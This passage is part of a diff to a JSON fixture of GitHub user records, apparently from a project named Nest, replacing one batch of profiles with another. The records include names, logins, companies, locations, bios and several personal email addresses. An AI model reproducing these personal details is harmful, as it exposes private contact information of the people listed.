"2017-04-16T21:58:13Z", + "updated_at": "2023-08-04T23:35:27Z", + "node_id": "MDQ6VXNlcjI3NjQ2ODYy", + "bio": "-Software engineering student\r\n-Universidad Autónoma de Zacatecas", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1787, + "pk": 7085, "fields": { - "nest_created_at": "2024-09-12T00:26:43.089Z", - "nest_updated_at": "2024-09-12T00:26:43.089Z", - "name": "Max Dreisbusch", - "login": "sagedemdreisbusch", - "email": "max.dreisbusch@sage.com", - "avatar_url": "https://avatars.githubusercontent.com/u/50825327?v=4", - "company": "@sage", - "location": "Germany", + "nest_created_at": "2024-09-22T08:39:45.080Z", + "nest_updated_at": "2024-09-22T19:24:28.808Z", + "name": "", + "login": "marcin-wrotecki", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56774329?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-05-20T08:52:53Z", - "updated_at": "2024-08-29T06:28:38Z", - "node_id": "MDQ6VXNlcjUwODI1MzI3", + "public_repositories_count": 16, + "created_at": "2019-10-19T21:15:53Z", + "updated_at": "2022-12-08T18:49:59Z", + "node_id": "MDQ6VXNlcjU2Nzc0MzI5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404928,49 +663052,74 @@ }, { "model": "github.user", - "pk": 1788, + "pk": 7086, "fields": { - "nest_created_at": "2024-09-12T00:26:45.540Z", - "nest_updated_at": "2024-09-12T01:24:21.827Z", - "name": "Georg Lippold", - "login": "gl-mc", + "nest_created_at": "2024-09-22T08:39:45.720Z", + "nest_updated_at": "2024-09-22T19:24:29.447Z", + "name": "Hritik Gupta", + "login": "hritikgupta", + "email": "hritikgupta9@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/24262284?v=4", + "company": "", + "location": "London", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 50, + "created_at": "2016-11-30T03:10:12Z", + "updated_at": "2024-09-20T15:41:30Z", + "node_id": "MDQ6VXNlcjI0MjYyMjg0", + "bio": "Software Engineer, CS Grad IIT Mandi", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7087, + "fields": { + "nest_created_at": "2024-09-22T08:39:46.034Z", + "nest_updated_at": "2024-09-22T19:24:29.756Z", + "name": "", + "login": "hemantgs", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50156958?v=4", - "company": "Mastercard", - "location": "Brisbane, Australia", + "avatar_url": "https://avatars.githubusercontent.com/u/13389954?v=4", + "company": "Trimble Technologies", + "location": "India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-04-30T22:58:38Z", - "updated_at": "2024-09-05T21:38:36Z", - "node_id": "MDQ6VXNlcjUwMTU2OTU4", - "bio": "Principal, Cryptographic Architecture & Engineering @ Mastercard", + "public_repositories_count": 18, + "created_at": "2015-07-18T04:33:37Z", + "updated_at": "2024-09-05T11:33:49Z", + "node_id": "MDQ6VXNlcjEzMzg5OTU0", + "bio": "Software Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1789, + "pk": 7088, "fields": { - "nest_created_at": "2024-09-12T00:26:46.710Z", - "nest_updated_at": "2024-09-12T00:26:46.710Z", - "name": "clf", - "login": "clfsoft", + "nest_created_at": "2024-09-22T08:39:46.344Z", + "nest_updated_at": "2024-09-22T19:24:30.072Z", + "name": "Abhishek Pal", + "login": "devabhishekpal", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1608414?v=4", - "company": "", - "location": "tokyo japan", + "avatar_url": "https://avatars.githubusercontent.com/u/43001336?v=4", + "company": "Cloudera", + "location": "India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 111, - "created_at": "2012-04-03T14:18:07Z", - "updated_at": "2024-07-06T09:58:42Z", - "node_id": "MDQ6VXNlcjE2MDg0MTQ=", + "following_count": 1, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 27, + "created_at": "2018-09-05T11:42:18Z", + "updated_at": "2024-09-22T07:57:18Z", + "node_id": "MDQ6VXNlcjQzMDAxMzM2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404978,24 +663127,24 @@ }, { "model": "github.user", - "pk": 1790, + "pk": 7089, "fields": { - "nest_created_at": "2024-09-12T00:26:47.943Z", - "nest_updated_at": "2024-09-12T02:36:27.733Z", - "name": "", - "login": "in-fke", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/73228413?v=4", + "nest_created_at": "2024-09-22T08:39:46.658Z", + "nest_updated_at": "2024-09-22T19:24:30.390Z", + "name": "mt-gitlocalize", + "login": "mt-gitlocalize", + "email": "mt@gitlocalize.com", + "avatar_url": "https://avatars.githubusercontent.com/u/34438160?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 0, + "following_count": 0, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2020-10-21T10:41:42Z", - "updated_at": "2023-01-09T07:47:30Z", - "node_id": "MDQ6VXNlcjczMjI4NDEz", + "public_repositories_count": 1, + "created_at": "2017-12-11T08:58:46Z", + "updated_at": "2021-06-07T07:42:40Z", + "node_id": "MDQ6VXNlcjM0NDM4MTYw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405003,24 +663152,24 @@ }, { "model": "github.user", - "pk": 1791, + "pk": 7090, "fields": { - "nest_created_at": "2024-09-12T00:26:49.145Z", - "nest_updated_at": "2024-09-12T00:26:49.145Z", - "name": "", - "login": "christophweser", + "nest_created_at": "2024-09-22T08:39:47.320Z", + "nest_updated_at": "2024-09-22T19:24:31.028Z", + "name": "Alexandre Gigleux", + "login": "agigleux", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65313217?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1057037?v=4", + "company": "@SonarSource ", + "location": "Switzerland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 17, + "followers_count": 43, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-05-13T20:52:28Z", - "updated_at": "2024-01-17T20:02:11Z", - "node_id": "MDQ6VXNlcjY1MzEzMjE3", + "public_repositories_count": 113, + "created_at": "2011-09-16T20:38:10Z", + "updated_at": "2024-08-19T08:15:18Z", + "node_id": "MDQ6VXNlcjEwNTcwMzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405028,24 +663177,24 @@ }, { "model": "github.user", - "pk": 1792, + "pk": 7091, "fields": { - "nest_created_at": "2024-09-12T00:26:51.227Z", - "nest_updated_at": "2024-09-12T00:26:51.227Z", - "name": "Arnaud Grandville", - "login": "agrandville", - "email": "agrandville@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7641990?v=4", + "nest_created_at": "2024-09-22T08:39:47.640Z", + "nest_updated_at": "2024-09-22T19:24:31.347Z", + "name": "Owen Yang", + "login": "fengyuanyang", + "email": "coolsealtw@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3124499?v=4", "company": "", - "location": "France", + "location": "Taiwan", "collaborators_count": 0, - "following_count": 10, - "followers_count": 2, - "public_gists_count": 14, - "public_repositories_count": 15, - "created_at": "2014-05-20T07:17:01Z", - "updated_at": "2024-09-10T14:53:19Z", - "node_id": "MDQ6VXNlcjc2NDE5OTA=", + "following_count": 6, + "followers_count": 5, + "public_gists_count": 9, + "public_repositories_count": 33, + "created_at": "2012-12-26T04:02:09Z", + "updated_at": "2024-04-16T06:32:59Z", + "node_id": "MDQ6VXNlcjMxMjQ0OTk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405053,24 +663202,24 @@ }, { "model": "github.user", - "pk": 1793, + "pk": 7092, "fields": { - "nest_created_at": "2024-09-12T00:26:55.606Z", - "nest_updated_at": "2024-09-12T00:26:55.606Z", - "name": "", - "login": "jerome-rauline", + "nest_created_at": "2024-09-22T08:39:47.947Z", + "nest_updated_at": "2024-09-22T19:24:31.661Z", + "name": "Joshua Kwiatkowski", + "login": "kjosh", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/58846383?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/821079?v=4", "company": "", - "location": "", + "location": "Hamburg, Germany", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-12-13T09:51:20Z", - "updated_at": "2019-12-13T10:07:47Z", - "node_id": "MDQ6VXNlcjU4ODQ2Mzgz", + "public_repositories_count": 5, + "created_at": "2011-05-31T16:27:57Z", + "updated_at": "2024-09-13T07:10:17Z", + "node_id": "MDQ6VXNlcjgyMTA3OQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405078,49 +663227,49 @@ }, { "model": "github.user", - "pk": 1794, + "pk": 7093, "fields": { - "nest_created_at": "2024-09-12T00:26:56.832Z", - "nest_updated_at": "2024-09-12T00:26:56.832Z", - "name": "Andreas Buschka", - "login": "sleepy-manul", + "nest_created_at": "2024-09-22T08:39:48.267Z", + "nest_updated_at": "2024-09-22T19:24:31.977Z", + "name": "Dolly", + "login": "1411dolly0", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6627519?v=4", - "company": "Qvest Digital AG", - "location": "Bonn, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/73784751?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 8, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2014-02-08T22:18:13Z", - "updated_at": "2024-08-27T15:49:47Z", - "node_id": "MDQ6VXNlcjY2Mjc1MTk=", - "bio": "Passionate DevOps engineer with a weakness for PostgreSQL and occasionally embedded Linux/ARM64. Former Oracle DBA for ten years. Working for @qvest-digital ", + "public_repositories_count": 11, + "created_at": "2020-11-01T13:57:41Z", + "updated_at": "2024-05-06T11:39:35Z", + "node_id": "MDQ6VXNlcjczNzg0NzUx", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1795, + "pk": 7094, "fields": { - "nest_created_at": "2024-09-12T00:26:59.314Z", - "nest_updated_at": "2024-09-12T00:26:59.314Z", - "name": "Aaron Goldenthal", - "login": "aarongoldenthal", + "nest_created_at": "2024-09-22T08:39:48.900Z", + "nest_updated_at": "2024-09-22T19:24:32.601Z", + "name": "", + "login": "hks1", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6117004?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/12284681?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 13, "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 28, - "created_at": "2013-12-05T19:21:00Z", - "updated_at": "2024-09-06T18:55:51Z", - "node_id": "MDQ6VXNlcjYxMTcwMDQ=", + "public_gists_count": 41, + "public_repositories_count": 60, + "created_at": "2015-05-07T00:28:08Z", + "updated_at": "2024-07-29T10:37:37Z", + "node_id": "MDQ6VXNlcjEyMjg0Njgx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405128,24 +663277,24 @@ }, { "model": "github.user", - "pk": 1796, + "pk": 7095, "fields": { - "nest_created_at": "2024-09-12T00:27:00.563Z", - "nest_updated_at": "2024-09-12T00:27:00.563Z", + "nest_created_at": "2024-09-22T08:39:49.224Z", + "nest_updated_at": "2024-09-22T19:24:32.920Z", "name": "", - "login": "Arivazhagan-s", + "login": "o0o-v4mp1r3-o0o", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/89505044?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/79766252?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-08-25T05:22:45Z", - "updated_at": "2021-08-25T05:22:45Z", - "node_id": "MDQ6VXNlcjg5NTA1MDQ0", + "public_repositories_count": 14, + "created_at": "2021-02-27T19:36:19Z", + "updated_at": "2024-07-27T23:23:34Z", + "node_id": "MDQ6VXNlcjc5NzY2MjUy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405153,14 +663302,14 @@ }, { "model": "github.user", - "pk": 1797, + "pk": 7096, "fields": { - "nest_created_at": "2024-09-12T00:27:01.763Z", - "nest_updated_at": "2024-09-12T00:27:01.763Z", - "name": "", - "login": "anilmukkamala", + "nest_created_at": "2024-09-22T08:39:49.535Z", + "nest_updated_at": "2024-09-22T19:24:33.229Z", + "name": "Nicolas", + "login": "NMV01", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/89027166?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/93595991?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -405168,9 +663317,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2021-08-16T14:20:38Z", - "updated_at": "2023-05-23T14:02:15Z", - "node_id": "MDQ6VXNlcjg5MDI3MTY2", + "created_at": "2021-11-02T13:33:00Z", + "updated_at": "2022-03-03T09:19:42Z", + "node_id": "U_kgDOBZQpVw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405178,24 +663327,24 @@ }, { "model": "github.user", - "pk": 1798, + "pk": 7097, "fields": { - "nest_created_at": "2024-09-12T00:27:02.579Z", - "nest_updated_at": "2024-09-12T00:27:02.579Z", - "name": "pvegh", - "login": "pvegh", + "nest_created_at": "2024-09-22T08:39:49.848Z", + "nest_updated_at": "2024-09-22T19:24:33.550Z", + "name": "", + "login": "t0bel1x", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3873889?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/56130979?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, + "following_count": 0, "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 6, - "created_at": "2013-03-15T10:48:32Z", - "updated_at": "2024-08-25T11:33:41Z", - "node_id": "MDQ6VXNlcjM4NzM4ODk=", + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-10-03T17:33:44Z", + "updated_at": "2022-03-31T22:52:31Z", + "node_id": "MDQ6VXNlcjU2MTMwOTc5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405203,24 +663352,24 @@ }, { "model": "github.user", - "pk": 1799, + "pk": 7098, "fields": { - "nest_created_at": "2024-09-12T00:27:10.321Z", - "nest_updated_at": "2024-09-12T00:27:10.321Z", - "name": "Robert Avram", - "login": "rd-robert-avram", + "nest_created_at": "2024-09-22T08:39:50.477Z", + "nest_updated_at": "2024-09-22T19:24:34.176Z", + "name": "", + "login": "rai-sandeep", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/67262057?v=4", - "company": "REWE Digital GmbH", + "avatar_url": "https://avatars.githubusercontent.com/u/36532643?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 1, - "public_gists_count": 8, - "public_repositories_count": 3, - "created_at": "2020-06-22T08:22:50Z", - "updated_at": "2023-01-20T14:17:49Z", - "node_id": "MDQ6VXNlcjY3MjYyMDU3", + "public_gists_count": 7, + "public_repositories_count": 33, + "created_at": "2018-02-16T09:19:15Z", + "updated_at": "2024-06-25T02:59:17Z", + "node_id": "MDQ6VXNlcjM2NTMyNjQz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405228,24 +663377,24 @@ }, { "model": "github.user", - "pk": 1800, + "pk": 7099, "fields": { - "nest_created_at": "2024-09-12T00:27:11.563Z", - "nest_updated_at": "2024-09-12T00:27:11.563Z", - "name": "rowe42", - "login": "rowe42", + "nest_created_at": "2024-09-22T08:39:50.812Z", + "nest_updated_at": "2024-09-22T19:24:34.495Z", + "name": "GSH", + "login": "gled02", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25983841?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/78102912?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 20, - "created_at": "2017-02-23T14:53:03Z", - "updated_at": "2024-08-02T13:02:25Z", - "node_id": "MDQ6VXNlcjI1OTgzODQx", + "public_repositories_count": 8, + "created_at": "2021-01-27T17:55:12Z", + "updated_at": "2024-07-02T22:01:47Z", + "node_id": "MDQ6VXNlcjc4MTAyOTEy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405253,74 +663402,74 @@ }, { "model": "github.user", - "pk": 1801, + "pk": 7100, "fields": { - "nest_created_at": "2024-09-12T00:27:12.362Z", - "nest_updated_at": "2024-09-12T00:27:12.362Z", - "name": "", - "login": "gosusnkr", + "nest_created_at": "2024-09-22T08:39:51.126Z", + "nest_updated_at": "2024-09-22T19:24:34.808Z", + "name": "Garvit Nagpal", + "login": "garvit2435", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10269103?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/74408151?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 3, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2014-12-22T11:15:13Z", - "updated_at": "2024-09-06T18:03:24Z", - "node_id": "MDQ6VXNlcjEwMjY5MTAz", - "bio": "", + "public_repositories_count": 18, + "created_at": "2020-11-13T10:54:57Z", + "updated_at": "2024-08-12T12:12:57Z", + "node_id": "MDQ6VXNlcjc0NDA4MTUx", + "bio": "I am a dedicated and enthusiastic Computer Science student with a passion for Software Development. Feel free to ping me up to collaborate on any project.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1802, + "pk": 7101, "fields": { - "nest_created_at": "2024-09-12T00:27:13.194Z", - "nest_updated_at": "2024-09-12T00:27:13.194Z", - "name": "Arjen Verstoep", - "login": "Terr", + "nest_created_at": "2024-09-22T08:39:51.463Z", + "nest_updated_at": "2024-09-22T19:24:35.124Z", + "name": "Eva", + "login": "yuhwaa", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/108282?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/101489014?v=4", "company": "", - "location": "The Netherlands", + "location": "New York City", "collaborators_count": 0, - "following_count": 10, - "followers_count": 20, - "public_gists_count": 1, - "public_repositories_count": 42, - "created_at": "2009-07-24T10:22:13Z", - "updated_at": "2024-08-21T19:09:15Z", - "node_id": "MDQ6VXNlcjEwODI4Mg==", - "bio": "", + "following_count": 13, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2022-03-13T03:23:22Z", + "updated_at": "2024-07-02T02:09:46Z", + "node_id": "U_kgDOBgyZdg", + "bio": "I am a versatile software engineer with a unique blend of design expertise. My passion resides in problem-solving and creating elegant, user-friendly products. ", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1803, + "pk": 7102, "fields": { - "nest_created_at": "2024-09-12T00:27:14.395Z", - "nest_updated_at": "2024-09-12T00:27:14.395Z", - "name": "Matt S", - "login": "mvs5465", + "nest_created_at": "2024-09-22T08:39:52.091Z", + "nest_updated_at": "2024-09-22T19:24:35.773Z", + "name": "Scott Hammer", + "login": "shammer0", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12912578?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20209078?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 12, - "followers_count": 5, - "public_gists_count": 1, - "public_repositories_count": 26, - "created_at": "2015-06-16T13:43:43Z", - "updated_at": "2024-09-04T11:27:24Z", - "node_id": "MDQ6VXNlcjEyOTEyNTc4", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2016-06-29T15:12:18Z", + "updated_at": "2024-02-10T00:03:52Z", + "node_id": "MDQ6VXNlcjIwMjA5MDc4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405328,24 +663477,24 @@ }, { "model": "github.user", - "pk": 1804, + "pk": 7103, "fields": { - "nest_created_at": "2024-09-12T00:27:18.089Z", - "nest_updated_at": "2024-09-12T00:27:18.089Z", - "name": "", - "login": "gpanula", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4266790?v=4", + "nest_created_at": "2024-09-22T08:39:52.446Z", + "nest_updated_at": "2024-09-22T19:24:36.087Z", + "name": "Riccardo Solazzi", + "login": "TheZal", + "email": "rick.zal239@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12339188?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 1, - "public_gists_count": 4, - "public_repositories_count": 59, - "created_at": "2013-04-26T16:43:12Z", - "updated_at": "2024-02-20T02:30:01Z", - "node_id": "MDQ6VXNlcjQyNjY3OTA=", + "following_count": 2, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2015-05-08T12:51:18Z", + "updated_at": "2023-12-04T09:38:34Z", + "node_id": "MDQ6VXNlcjEyMzM5MTg4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405353,174 +663502,174 @@ }, { "model": "github.user", - "pk": 1805, + "pk": 7104, "fields": { - "nest_created_at": "2024-09-12T00:27:19.315Z", - "nest_updated_at": "2024-09-12T00:27:19.315Z", - "name": "kerenz", - "login": "keren-orca", + "nest_created_at": "2024-09-22T08:39:52.763Z", + "nest_updated_at": "2024-09-22T19:24:36.407Z", + "name": "Priyanka Agarwal", + "login": "priyanka010392", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/73239867?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58183621?v=4", + "company": "Walmart Global Tech", + "location": "Bengaluru", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-10-21T14:25:20Z", - "updated_at": "2024-07-24T09:14:00Z", - "node_id": "MDQ6VXNlcjczMjM5ODY3", - "bio": "", + "public_repositories_count": 16, + "created_at": "2019-11-25T16:35:01Z", + "updated_at": "2021-10-31T14:22:05Z", + "node_id": "MDQ6VXNlcjU4MTgzNjIx", + "bio": "Software Development Engineer\r\n\r\nJava | Spring | Oauth | AWS | Azure", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1806, + "pk": 7105, "fields": { - "nest_created_at": "2024-09-12T00:27:20.580Z", - "nest_updated_at": "2024-09-12T00:27:20.580Z", - "name": "Kai Bösefeldt", - "login": "kaiboesefeldt", + "nest_created_at": "2024-09-22T08:39:53.084Z", + "nest_updated_at": "2024-09-22T19:24:36.717Z", + "name": "Philipp Delmonego", + "login": "x7Git", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/63350184?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/32436674?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 2, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2020-04-08T11:53:42Z", - "updated_at": "2024-06-30T19:09:14Z", - "node_id": "MDQ6VXNlcjYzMzUwMTg0", - "bio": "Professional software developer, Kotlin, Python, C#", + "public_repositories_count": 3, + "created_at": "2017-10-01T16:38:13Z", + "updated_at": "2024-06-10T10:09:11Z", + "node_id": "MDQ6VXNlcjMyNDM2Njc0", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1807, + "pk": 7106, "fields": { - "nest_created_at": "2024-09-12T00:27:21.807Z", - "nest_updated_at": "2024-09-12T00:34:26.992Z", - "name": "James Howe", - "login": "OrangeDog", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/675056?v=4", - "company": "", - "location": "UK", + "nest_created_at": "2024-09-22T08:39:53.405Z", + "nest_updated_at": "2024-09-22T19:24:37.024Z", + "name": "Paul Weber", + "login": "000panther", + "email": "p4ul.weber@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/499094?v=4", + "company": "@dynatrace", + "location": "Linz, Austria", "collaborators_count": 0, - "following_count": 1, - "followers_count": 14, - "public_gists_count": 7, - "public_repositories_count": 54, - "created_at": "2011-03-17T12:39:19Z", - "updated_at": "2024-09-02T09:09:20Z", - "node_id": "MDQ6VXNlcjY3NTA1Ng==", - "bio": "", + "following_count": 26, + "followers_count": 11, + "public_gists_count": 9, + "public_repositories_count": 30, + "created_at": "2010-11-27T15:03:02Z", + "updated_at": "2024-07-17T20:14:15Z", + "node_id": "MDQ6VXNlcjQ5OTA5NA==", + "bio": "Developer. Coding for Food and other Neccities", "is_hireable": false, - "twitter_username": "" + "twitter_username": "000panther" } }, { "model": "github.user", - "pk": 1808, + "pk": 7107, "fields": { - "nest_created_at": "2024-09-12T00:27:24.668Z", - "nest_updated_at": "2024-09-12T00:27:24.668Z", - "name": "Richard Fussenegger", - "login": "Fleshgrinder", - "email": "github@fleshgrinder.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1059453?v=4", - "company": "@personio", - "location": "Berlin, Germany", + "nest_created_at": "2024-09-22T08:39:53.717Z", + "nest_updated_at": "2024-09-22T19:24:37.333Z", + "name": "Kelvin Tran", + "login": "KelvinTran6", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46587057?v=4", + "company": "Circle Cardiovascular Imaging", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 107, - "public_gists_count": 25, - "public_repositories_count": 79, - "created_at": "2011-09-18T07:30:12Z", - "updated_at": "2024-09-08T06:50:22Z", - "node_id": "MDQ6VXNlcjEwNTk0NTM=", - "bio": "Passionate hands-on software engineer who enjoys programming and solving problems. 👾", + "following_count": 7, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2019-01-11T04:43:14Z", + "updated_at": "2024-09-10T01:32:56Z", + "node_id": "MDQ6VXNlcjQ2NTg3MDU3", + "bio": "Software Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1809, + "pk": 7108, "fields": { - "nest_created_at": "2024-09-12T00:27:25.889Z", - "nest_updated_at": "2024-09-12T00:27:25.890Z", - "name": "Peter", - "login": "peterfigure", + "nest_created_at": "2024-09-22T08:39:54.035Z", + "nest_updated_at": "2024-09-22T19:24:37.671Z", + "name": "Hussaina Begum", + "login": "hexxdump", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/62901374?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/631835?v=4", + "company": "VMware", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 2, - "public_repositories_count": 11, - "created_at": "2020-03-30T17:15:09Z", - "updated_at": "2022-05-04T21:51:05Z", - "node_id": "MDQ6VXNlcjYyOTAxMzc0", + "following_count": 27, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2011-02-22T12:26:12Z", + "updated_at": "2024-08-21T06:44:02Z", + "node_id": "MDQ6VXNlcjYzMTgzNQ==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "hexxdump" } }, { "model": "github.user", - "pk": 1810, + "pk": 7109, "fields": { - "nest_created_at": "2024-09-12T00:27:28.358Z", - "nest_updated_at": "2024-09-12T00:27:28.358Z", - "name": "", - "login": "pandischen", + "nest_created_at": "2024-09-22T08:39:54.346Z", + "nest_updated_at": "2024-09-22T19:24:37.992Z", + "name": "Olga Buyanovskaya", + "login": "pavluchenko", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10131362?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6200782?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 6, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2014-12-09T15:28:45Z", - "updated_at": "2023-12-12T02:33:06Z", - "node_id": "MDQ6VXNlcjEwMTMxMzYy", - "bio": "", + "public_repositories_count": 31, + "created_at": "2013-12-16T21:42:00Z", + "updated_at": "2024-01-22T09:54:14Z", + "node_id": "MDQ6VXNlcjYyMDA3ODI=", + "bio": "Software Engineer // olbuyanovskaya@gmail.com\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1811, + "pk": 7110, "fields": { - "nest_created_at": "2024-09-12T00:27:29.577Z", - "nest_updated_at": "2024-09-12T00:29:31.393Z", - "name": "Eric Ballet Baz", - "login": "eballetbaz", + "nest_created_at": "2024-09-22T08:39:54.658Z", + "nest_updated_at": "2024-09-22T19:24:38.321Z", + "name": "", + "login": "Emelie4", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22594539?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/108645700?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2016-10-03T14:25:05Z", - "updated_at": "2024-07-03T12:40:27Z", - "node_id": "MDQ6VXNlcjIyNTk0NTM5", + "public_repositories_count": 16, + "created_at": "2022-07-04T03:39:33Z", + "updated_at": "2024-08-25T10:07:54Z", + "node_id": "U_kgDOBnnNRA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405528,124 +663677,124 @@ }, { "model": "github.user", - "pk": 1812, + "pk": 7111, "fields": { - "nest_created_at": "2024-09-12T00:27:30.408Z", - "nest_updated_at": "2024-09-12T00:27:30.408Z", - "name": "Juha", - "login": "JuhaO81", - "email": "juhao81@gmail.com", - "avatar_url": 